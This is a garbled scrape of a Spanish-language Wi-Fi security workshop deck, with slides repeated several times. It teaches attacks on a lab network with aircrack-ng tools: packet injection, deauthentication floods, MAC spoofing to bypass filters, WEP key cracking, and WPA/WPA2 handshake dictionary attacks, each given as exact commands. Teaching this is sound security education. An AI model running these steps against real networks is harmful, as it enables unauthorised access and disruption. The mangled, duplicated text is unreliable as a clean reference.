bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 37: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 38: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

